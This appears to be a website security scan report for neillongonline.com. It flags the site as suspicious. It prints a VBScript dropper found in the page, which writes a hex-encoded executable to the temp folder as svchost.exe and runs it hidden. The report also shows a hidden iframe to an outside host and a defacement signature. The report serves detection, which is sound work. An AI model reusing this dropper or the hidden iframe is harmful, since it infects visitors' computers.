Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=neillongonline.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.neillongonline.com/ | 200 OK Content-Length: 119403 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Hidden iFrame found. size: 1x0 src: http://picosong.com/6fdj/ <iframe frameborder="0" height="0" src="http://picosong.com/6fdj/" width="1"> Deface/Content modification. The following signature was found: Hacked by Fouzi Baws-DZ & Farouk General <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/> <meta name="robot ...[120384 bytes skipped]... | ||
http://www.neillongonline.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 23 Dec 2015 15:33:39 GMT Pragma: no-cache Location: http://neillongonline.com/test404page.js Server: nginx/1.8.0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=8d4793ae46e19e73d68ffc0ad374a334; path=/ X-Pingback: http://neillongonline.com/xmlrpc.php X-UA-Compatible: IE=edge,chrome=1 | clean |
http://neillongonline.com/test404page.js | 404 Not Found Content-Length: 20172 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: neillong.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18564426-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scri ...[4391 bytes skipped]... | ||
http://neillongonline.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_audio-player.js | 200 OK Content-Length: 12020 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js?ver=3.9.9 | 200 OK Content-Length: 177127 Content-Type: application/x-javascript | clean |
http://neillongonline.com/wp-content/plugins/facebook-comments-notifier/fb-comments.js?ver=3.9.9 | 200 OK Content-Length: 4871 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/podpress/js/podpress.js?ver=3.9.9 | 200 OK Content-Length: 39825 Content-Type: application/javascript | clean |
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 148483 Content-Type: application/x-javascript | clean |
http://neillongonline.com/wp-content/plugins/wp-viral-payments/player/flowplayer/flowplayer.min.js | 200 OK Content-Length: 19756 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/wp-viral-payments/player/js/checkvideo.js | 200 OK Content-Length: 2705 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/maxblogpress-unblockable-popup/mup-lib/include/mup_simple/upop_fade.js | 200 OK Content-Length: 9127 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 177127 Content-Type: application/x-javascript | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://neillongonline.com/wp-content/plugins/wp-viral-payments/js/custom-functions.js?ver=3.9.9 | 200 OK Content-Length: 7645 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: neillongonline.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: neillongonline.com
Referer: http://www.google.com/search?q=neillongonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.